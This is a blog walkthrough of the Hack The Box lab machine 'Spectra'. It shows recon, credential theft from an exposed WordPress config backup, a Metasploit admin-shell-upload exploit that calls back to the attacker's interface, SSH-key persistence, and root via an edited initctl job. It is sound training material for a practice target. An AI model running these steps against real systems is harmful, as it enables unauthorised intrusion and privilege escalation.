Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Spectra
|htbmachinesretired|

Spectra

Summary

Spectra, was a easy chromeos machine by user egre55. Inital foothold was find db creds in .save file leaking from /testing route. checking the creds resuse on /main route (wordpress) was successful. using unix/webapp/wp_admin_shell_upload metasploit to get a shell as nginx. enumerating the box in /opt we find a config which give us a hint to check for credentials in /etc/autologin which gave user password and we can ssh as user. Privelege Escalation on the box was exploiting initctl to get root.

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Nmap 7.91 scan initiated Sun Feb 28 08:24:56 2021 as: nmap -v -sC -sV -oN nmap/spectra 10.10.10.229
Nmap scan report for 10.10.10.229
Host is up (0.084s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql            MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open  blackice-icecap?
| fingerprint-strings:
|   FourOhFourRequest, GetRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 28 Feb 2021 02:55:18 GMT
|     Connection: close
|     Hello World
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 28 Feb 2021 02:55:24 GMT
|     Connection: close
|_    Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=2/28%Time=603B060A%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain\r\nD
SF:ate:\x20Sun,\x2028\x20Feb\x202021\x2002:55:18\x20GMT\r\nConnection:\x20
SF:close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\x2020
SF:0\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2028\x20Feb\x2
SF:02021\x2002:55:18\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20World\
SF:n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain\r\nDate:\x20Sun,\x2028\x20Feb\x202021\x2002:55:24\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\nHello\x20World\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 28 08:25:45 2021 -- 1 IP address (1 host up) scanned in 48.70 seconds

nmap scan show few ports open as 22, 80, 3306 and 8081

let us start with port 80

Web (80)

clicking on first link take me to

so i added spectra.htb to my host file and revisited that page

which seem to be an wordpress site.

so lets run wpscan on that and check the other link

which leak the content of the testing page. and also the most interesting file i saw was wp-config.php.save so i downloaded that

1
wget http://spectra.htb/testing/wp-config.php.save

in that file i found db creds to be

1
2
3
4
5
6
7
8
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

trying the same password on wordpress login for administrator we get a successful login

knowing we have a valid credential let use msf to get a shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST spectra.htb
VHOST => spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
TARGETURI => /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.229
RHOSTS => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

Get me a shell, but with limited access so i wrote a ssh key in

1
echo 'public-key' >> ~/.ssh/authorized_keys

and ssh on the box using that key.

nginx (shell)

Enumerating the box i found a script in /opt as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nginx@spectra /opt $ cat autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

which point me to a /etc/autlogin/passwd file checking that get me a password as SummerHereWeCome!!

using which we can ssh to the box as katie

User (Katie)

using the above password we can ssh on the box as katie

running linpeas

showed me this. also checking sudo -l confirmed my doubt

1
2
3
katie@spectra /etc/init $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

so updating one of test.conf i added

1
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2oDIwi5nspd8SSH7FRhsbx3ymS8tdcFiTWdGsO6hFoZPYQGQvRmDXyrs3IxiR7xmlr6vFWyUnwmzqG1ljcnRRRcNjWFtBe/VL6E4X15Rt7V+uALje5ocLJRhE6RUDeqegcw7YxFZo6tZhmqn/AJoku8E4pYeqr8BqINHQZ0+XU9grmcrULC0axodX38hi5TnBama3tzP9HHn1sCgohkViJxfb89sTfpG0bVS7IQatrqNavi5VdNdoZACIr2ldWURpZoioi3/Z9OAITK17GKlAI8j45KRrq3JSsKY5vH/flhUlZhmKXXgO6kZ90dn0RNTKm56Fa8NPmHMG1S1VXnBJya2JB+gEihZVY3LMnp3dO7d2627Krk+lMCyBcao6lDwMq70nfI0MZbFWUvtsy0M3DaJDnJ4/rV3skLYJKHkT0JZAzGNGOMdnRcSeu1ld0YjbS1WfZQNGtpX3gAnoP37/axN2BlsZ8/5W/jXi0zWZuU9FsKGUp09yklVVcm5okdk=" >> /root/.ssh/authorized_keys

in pre-start script and ran

1
sudo initctl start

and on other pane ssh -i key root@10.10.10.229 and was able to login to the box as root.

Extra

I even wrote an python script to get root from user. autopwn

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/spectra/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
retiredhacktheboxeasywordpresscred-reusechromeosinitctl